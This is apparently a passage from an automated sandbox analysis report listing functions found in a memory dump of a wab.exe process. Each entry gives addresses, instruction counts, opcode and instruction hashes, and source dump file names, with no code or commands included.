                                                            • Instruction ID: 14da26f22a37bb5000238990ae1f7695027c6a49202936e5070176d568246c3a
                                                            • Opcode Fuzzy Hash: 2103513d2fbd223765d54b27d59d1ce24549dd4e977acd5ce3c70b0a80ca45ab
                                                            • Instruction Fuzzy Hash: 5701F776A112049BDB11DA54ED00F6573A9DB85628F18416AFF158F3C0DB34D901C79D
                                                            Function 0361826B Relevance: .0, Instructions: 46COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 10b03427e8eb01c47977d0c83b699f9a05d8b207813a8ce99877c82d8464dc34
                                                            • Instruction ID: 7616fdb53f8595ab045df638c122ae5a93cc553741fd19235dd7cf962c19404d
                                                            • Opcode Fuzzy Hash: 10b03427e8eb01c47977d0c83b699f9a05d8b207813a8ce99877c82d8464dc34
                                                            • Instruction Fuzzy Hash: 0E01A736700A08DFD705EF6DD9109AEF7A9EF46650F1D406D9901DB650DE30DD01C6D8
                                                            Function 0363E016 Relevance: .0, Instructions: 46COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                                            • Instruction ID: d2f7323b5fd56a4072cea48b02d6acbff5586b927d36705baccc7c1f1b8b4801
                                                            • Opcode Fuzzy Hash: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                                            • Instruction Fuzzy Hash: AD017872200A809FD322C61DCA48F66B7ECEB46760F0D04A6F805CB7A1D729DC41CA25
                                                            Function 036DF367 Relevance: .0, Instructions: 45COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 4977e44560d2b5b48a2d3a48a0e5b3196c7a4d6a522bc373e44d5567a765f84a
                                                            • Instruction ID: 25515458d1743eac7bd64da949d2a96900080efc78414aadd99c5ef8db681b7f
                                                            • Opcode Fuzzy Hash: 4977e44560d2b5b48a2d3a48a0e5b3196c7a4d6a522bc373e44d5567a765f84a
                                                            • Instruction Fuzzy Hash: 26018F75A00358ABDB10EFA9D815FAEBBB8EF44740F05406AB901EF380DAB4DA01C794
                                                            Function 036E972B Relevance: .0, Instructions: 44COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 12d69b80bc09a443baffa0cc5cbca6f8f88db38978ae6a908cdca1f93a55da69
                                                            • Instruction ID: e55596d33dfde9271844e2881c656f44701300612e66d90dcfe3f6a49795b747
                                                            • Opcode Fuzzy Hash: 12d69b80bc09a443baffa0cc5cbca6f8f88db38978ae6a908cdca1f93a55da69
                                                            • Instruction Fuzzy Hash: 2111A5B1A106219FDB88CF2DC0C0651BBE8FB88350B0582AAED18CB74AD374E915CF94
                                                            Function 036F5636 Relevance: .0, Instructions: 44COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 637902ab0836079eac5e1c11f944f8a9a514c14e39f2a94a333f2850c859de7b
                                                            • Instruction ID: 948138a780e84448e003848dbc19f6a87b85d3adc37de7c109edb977a414242c
                                                            • Opcode Fuzzy Hash: 637902ab0836079eac5e1c11f944f8a9a514c14e39f2a94a333f2850c859de7b
                                                            • Instruction Fuzzy Hash: AB118078D00249EFCB04DFA9D540AAEB7B4EF09304F14805AB915EB350D734DA02CB54
                                                            Function 0361C310 Relevance: .0, Instructions: 43COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                            • Instruction ID: 4b26396e213c2dd1e509b596b3fc04f08b6ffb4a35f33fc345435453425455e6
                                                            • Opcode Fuzzy Hash: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                            • Instruction Fuzzy Hash: FBF02B37284B329BC732DA598880B2FE6998FC2B64F1E0039F1099F744CA658C1397D0
                                                            Function 036F5152 Relevance: .0, Instructions: 43COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 4fb1d1518c578febdff216dc09daaef0aca7504e4a112a32f9b18116c4bda444
                                                            • Instruction ID: 6bebfa1f821111b6c48715b164e196176ffda1bebe42de8516d44d6c1c8c29ab
                                                            • Opcode Fuzzy Hash: 4fb1d1518c578febdff216dc09daaef0aca7504e4a112a32f9b18116c4bda444
                                                            • Instruction Fuzzy Hash: 13012C75A10209AFDB01DFA9D941AEEBBB8EF49740F10405AEA01EB350D774AA018BA4
                                                            Function 036F5060 Relevance: .0, Instructions: 43COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d196d4941da454f9e984f11468e875477b2d4bb2a452868aaaf5fd78000f2f3e
                                                            • Instruction ID: bbac170ac03a6fd53673524461dab37a39fa3e68f308e44e102e677734ebb148
                                                            • Opcode Fuzzy Hash: d196d4941da454f9e984f11468e875477b2d4bb2a452868aaaf5fd78000f2f3e
                                                            • Instruction Fuzzy Hash: D4012C75A10309AFCB04EFA9D941AEEB7B8EF49340F10405AFA01EB351D674AE018BA4
                                                            Function 0364C073 Relevance: .0, Instructions: 43COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                            • Instruction ID: 5eda48a87e498c2d66848d22eafc0574aceadb2bc2f32a29bd9b61f2d43bac1f
                                                            • Opcode Fuzzy Hash: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                            • Instruction Fuzzy Hash: 28F0C2B2A01A10ABD328CF4DDD40E57F7EADBC1A80F08812CA505CB320EA31DD04CB90
                                                            Function 036F50D9 Relevance: .0, Instructions: 43COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b44030154a4b8fdfcba58aeee0f2502512daf62fb9fa08bf6db95c61f68371da
                                                            • Instruction ID: 3f1c6e85d5ed6aacabfaf462f357e1c39b09fafe333515dfa18e1f2b2c86748d
                                                            • Opcode Fuzzy Hash: b44030154a4b8fdfcba58aeee0f2502512daf62fb9fa08bf6db95c61f68371da
                                                            • Instruction Fuzzy Hash: 85012175A0030DAFCB00DF69D9419EEBBB8EF4A340F50405AE601F7350D674AD018BA4
                                                            Function 03655734 Relevance: .0, Instructions: 43COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 142e258c31b2854674597990c3f52e5af594bf5f99f2c3b686c6bb1bb1f636c8
                                                            • Instruction ID: 86683dcc11720d1129774263731f63ea7bf2f5c8ba410298b50db2a67dbe9982
                                                            • Opcode Fuzzy Hash: 142e258c31b2854674597990c3f52e5af594bf5f99f2c3b686c6bb1bb1f636c8
                                                            • Instruction Fuzzy Hash: 28F0F472501214AFE319CF5CC944F5AF7EDDB46650F054079EA02DB231D671DE04CA94
                                                            Function 036DF78A Relevance: .0, Instructions: 42COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a7df4e032baead483695251e2eb4e3e73b1dd33342bc8609cd182dc87b7a377f
                                                            • Instruction ID: 7be2d48d421db220e360e6d42ad17a3d3468d77f2e5c25270a8c6b4e4cd30208
                                                            • Opcode Fuzzy Hash: a7df4e032baead483695251e2eb4e3e73b1dd33342bc8609cd182dc87b7a377f
                                                            • Instruction Fuzzy Hash: 15010075E007499FCB04DFA9D545AEEB7F4EF08344F108059A855EB351E674DA00CB55
                                                            Function 036DF2F8 Relevance: .0, Instructions: 41COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f6ab53a5dfb2d36bbddb09b41ac4ff1f6bcf97ed5e6848f326b8de93362132f9
                                                            • Instruction ID: 5267a4bbc549622121405fbfb442daa9aef5de5f95d67e440579d78681e3ec31
                                                            • Opcode Fuzzy Hash: f6ab53a5dfb2d36bbddb09b41ac4ff1f6bcf97ed5e6848f326b8de93362132f9
                                                            • Instruction Fuzzy Hash: 96F0C876F10348ABD704DFB9D505AEEB7B8EF49710F01805AE501EB390DA75D9018794
                                                            Function 036F61E5 Relevance: .0, Instructions: 41COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3e6b569974a82bcb0993ca670be99bb8173b996a75200fccad665215fb813983
                                                            • Instruction ID: 2cdcf7a2f525c9583c8354ae88b305e93bb8517018dc1138e2ff2e14e1b3da06
                                                            • Opcode Fuzzy Hash: 3e6b569974a82bcb0993ca670be99bb8173b996a75200fccad665215fb813983
                                                            • Instruction Fuzzy Hash: F9014F75A002499FCB04DFA9D545AEEB7B8EF49350F14405AE501EB390D778EA01CB98
                                                            Function 0365724D Relevance: .0, Instructions: 40COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 44620c8b90c707c3135ebb5afdba643e124f7b09bfea536c61b6b3c3b840e391
                                                            • Instruction ID: acd4395cdbd12458909f12c1218d429d283774037814447cb25ee36a80175872
                                                            • Opcode Fuzzy Hash: 44620c8b90c707c3135ebb5afdba643e124f7b09bfea536c61b6b3c3b840e391
                                                            • Instruction Fuzzy Hash: 5DF02B75A013556FEB11DBA98A40FAFFBA89F80710F0D85B9FD01DB240DA70E940C798
                                                            Function 036F53FC Relevance: .0, Instructions: 39COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 406d70a6e17ebccfea1ad39b35280127d7c76c792c063e25f1bfe118906623ba
                                                            • Instruction ID: 08bc5d7c6a33962498bc5071a4c8da645ff251124483702764c86e1cd51c65d3
                                                            • Opcode Fuzzy Hash: 406d70a6e17ebccfea1ad39b35280127d7c76c792c063e25f1bfe118906623ba
                                                            • Instruction Fuzzy Hash: 4B012C74E00709DFDB04DFA9D545B9EF7F4FF08300F148269A519EB381EA749A418BA4
                                                            Function 0361C0F0 Relevance: .0, Instructions: 39COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 684a9b2bb1e166652b4142378121c5b1db171e32363a291ea6900b2daddc4d8d
                                                            • Instruction ID: 2085c89ad589ceae47277bb63fc79b665951c3cf428ef0bc07fd2d229cea4918
                                                            • Opcode Fuzzy Hash: 684a9b2bb1e166652b4142378121c5b1db171e32363a291ea6900b2daddc4d8d
                                                            • Instruction Fuzzy Hash: 58F0F0713C42015FE290D629DD12B363AAAE7C46A0F6D806AEB058F3D0EA70D81182A4
                                                            Function 036F3749 Relevance: .0, Instructions: 38COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 9c86c39bdb6e5f373c63bc0b61fffc749c090866831c7dd43b14b299580d1563
                                                            • Instruction ID: 4274263774006688ab94a619dcf1b1e8525db56f5b9e5e6b9247885b8d652806
                                                            • Opcode Fuzzy Hash: 9c86c39bdb6e5f373c63bc0b61fffc749c090866831c7dd43b14b299580d1563
                                                            • Instruction Fuzzy Hash: 17F04476540344BFE711DB64CD41FDA77BCDB04714F100169A616DB290E670EE44CB94
                                                            Function 036C437C Relevance: .0, Instructions: 37COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                            • Instruction ID: 1356d65b5dd7d7547e9b3895cd4423f5bbfed3a36a8b12ceec4aafa8291e0524
                                                            • Opcode Fuzzy Hash: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                            • Instruction Fuzzy Hash: C0F0B435761AA247DB77FA2B8930B3AE655DFC0A40B49062C95098B780DF20D801C794
                                                            Function 036DF3E6 Relevance: .0, Instructions: 35COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c0a62b153e2dd74a5938c18db4bd6ddc92b0b16fc376884568e65cbe3c43e452
                                                            • Instruction ID: fe4307dc10c32cc50d2e7a3838301d8a001a03326f9b3ac34cb4f405a158ec98
                                                            • Opcode Fuzzy Hash: c0a62b153e2dd74a5938c18db4bd6ddc92b0b16fc376884568e65cbe3c43e452
                                                            • Instruction Fuzzy Hash: 59F04F75E00348AFCB04EFA9D545A9EB7F4EF09300F508069B945EB391D674EA01CB54
                                                            Function 036192FF Relevance: .0, Instructions: 35COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 114dddc12ea669304e8510a3d79d7ba26c0606da752754163e067372bb9134f3
                                                            • Instruction ID: bc935d8ee4604e30e447716ad96510b1664c9368f5ff5bc1282d048884ec7c9f
                                                            • Opcode Fuzzy Hash: 114dddc12ea669304e8510a3d79d7ba26c0606da752754163e067372bb9134f3
                                                            • Instruction Fuzzy Hash: 68F0FA32200340ABD731EB19CD08F9ABBEDEF85B00F1C011CA54293290C7A1A909CAA0
                                                            Function 036247FB Relevance: .0, Instructions: 33COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 10c67d2a978f60bbea00cf58667f995514f53293810ba54f450106114dd8664e
                                                            • Instruction ID: 60acf0412eb45bf703583fc5b52ee86288d93671444e694d9da842efd0b8f48e
                                                            • Opcode Fuzzy Hash: 10c67d2a978f60bbea00cf58667f995514f53293810ba54f450106114dd8664e
                                                            • Instruction Fuzzy Hash: 45F06231921AF09FD723D75A8244B91BFD89B01664F0F49AADD4587611CA28D840CA51
                                                            Function 036E0115 Relevance: .0, Instructions: 32COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a3109d8688804cefe4f046e7ccf1cb850720e2939c4a078cdca8804ce4bb5d55
                                                            • Instruction ID: 01ffda059ecc7583bdbefd7dda61edc6e0d19cc93f24ac59acd2e30090f67286
                                                            • Opcode Fuzzy Hash: a3109d8688804cefe4f046e7ccf1cb850720e2939c4a078cdca8804ce4bb5d55
                                                            • Instruction Fuzzy Hash: 52F0A76F81778457DF21FB6DB6503D1BF699742114F1E548DC8A15F345C5B88487C224
                                                            Function 036F539D Relevance: .0, Instructions: 31COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 7fe19fdc4ad4f05c5a1d679f66ec6c57a99b58dac7f1fdf871e8c5a8b15ee952
                                                            • Instruction ID: 8bf181f7fc670264186410454e425f2119042c71853e59a79378a9fd1536a9ee
                                                            • Opcode Fuzzy Hash: 7fe19fdc4ad4f05c5a1d679f66ec6c57a99b58dac7f1fdf871e8c5a8b15ee952
                                                            • Instruction Fuzzy Hash: 29F05475A1074C9FD704EB79D545B6DB7B4EF09304F108059E602EB391EA74ED018B14
                                                            Function 036F52E2 Relevance: .0, Instructions: 31COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 23ff4dcdc62c1fdd5bd37fb5ff59c56434c2d17c2cb08e745ca80d0135d5b383
                                                            • Instruction ID: d03bac0fa6e45357dcfe5afb58c9a62ff42b36f51ba0e6866cfa5b78f84f7066
                                                            • Opcode Fuzzy Hash: 23ff4dcdc62c1fdd5bd37fb5ff59c56434c2d17c2cb08e745ca80d0135d5b383
                                                            • Instruction Fuzzy Hash: 6BF0E279A10348AFCB04EFB9E601E6EB3B4EF09300F144058A601EB380EA78ED01CB58
                                                            Function 036F5283 Relevance: .0, Instructions: 31COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a7b8c1a3ca70f0796a90961b6e3d54ee12527216a324ddcbedec26b6ed917022
                                                            • Instruction ID: 1bec75c8c9a100a02873c1d801f294be13fee7a29c8e21e9daa6bf9b24939f9c
                                                            • Opcode Fuzzy Hash: a7b8c1a3ca70f0796a90961b6e3d54ee12527216a324ddcbedec26b6ed917022
                                                            • Instruction Fuzzy Hash: D9F05E78A10748AFDB04EBA9E505AAEB7B4EF09300F544459A641EB391EB78E9018B58
                                                            Function 03662619 Relevance: .0, Instructions: 31COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                            • Instruction ID: a034d81e502060875c75af6fba8de6a2fce02920b1596f573d4c8222f6f08dec
                                                            • Opcode Fuzzy Hash: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                            • Instruction Fuzzy Hash: 0EE09232301A002BD711DE59CCD0F4777AE9F82B50F04047DB9049F252CAE2DC1982A8
                                                            Function 036F5341 Relevance: .0, Instructions: 30COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a479ed0b1ac9610b01654acfa52d072834b915ae8659d00aedc36637ff0a4d38
                                                            • Instruction ID: bf0f81241f43c82d639a2512a7890304d57cfc8007b4a3843800c52de5b1a83f
                                                            • Opcode Fuzzy Hash: a479ed0b1ac9610b01654acfa52d072834b915ae8659d00aedc36637ff0a4d38
                                                            • Instruction Fuzzy Hash: 17F08275A04248EFCB04EBA9E545E9EB7B4EF0A244F540159A602EB3D0EA74DD008718
                                                            Function 036F5227 Relevance: .0, Instructions: 30COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 75f3d5a0efbec628a16ea31ffec24e19b8bdd49dce2f9343f24907ed350e2554
                                                            • Instruction ID: 648c1d916b06bb01e58503785293ad86c1fbb4606c275c9dacad9210015a7160
                                                            • Opcode Fuzzy Hash: 75f3d5a0efbec628a16ea31ffec24e19b8bdd49dce2f9343f24907ed350e2554
                                                            • Instruction Fuzzy Hash: AAF08274A14348AFDB04EBA9E645E6EB3B4EF09704F140058AA02EB395EA74DD018758
                                                            Function 03657208 Relevance: .0, Instructions: 30COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 171bee56a01fee66ec2a19aed4ba5a7b5b43ec8e969204cb7a187c11db67e997
                                                            • Instruction ID: 5446d76c936e164599adec6a527523c466d80c39b061d1ee76921f0d5198486d
                                                            • Opcode Fuzzy Hash: 171bee56a01fee66ec2a19aed4ba5a7b5b43ec8e969204cb7a187c11db67e997
                                                            • Instruction Fuzzy Hash: D4F0A0719116949FEB23D79AC2C4B22B7DC9B01BB4F0D85A6E8098FB11CF28D892C254
                                                            Function 036F51CB Relevance: .0, Instructions: 30COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c3468ee4ca3cc353bf20dd4a020378b972df1cbb6a68a46517b9097b85f7b51d
                                                            • Instruction ID: fb266c0f81a80cc716486e463fc760849138cab424aa758cbcb9acda9735c521
                                                            • Opcode Fuzzy Hash: c3468ee4ca3cc353bf20dd4a020378b972df1cbb6a68a46517b9097b85f7b51d
                                                            • Instruction Fuzzy Hash: FDF08274A10248AFDB04EBA9D615E6EB7B4EF09304F140059AA01EB3D0EA74ED01C758
                                                            Function 0369D070 Relevance: .0, Instructions: 30COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 29a6642c7ef7ed3592a36acdccc95c3bae471711bc0d42908ddba4b2807d0017
                                                            • Instruction ID: 9dff5427e221ce9a4f9867b7259ccd61eb8406fc0bdf3eda92100d8fb24ba827
                                                            • Opcode Fuzzy Hash: 29a6642c7ef7ed3592a36acdccc95c3bae471711bc0d42908ddba4b2807d0017
                                                            • Instruction Fuzzy Hash: 48F0E53360461467C230AA098C05F5BFBACDBD5B70F20032EBA249B2D0DA74A911C7DA
                                                            Function 036DF72E Relevance: .0, Instructions: 30COMMON
                                                            Download Yara Rule
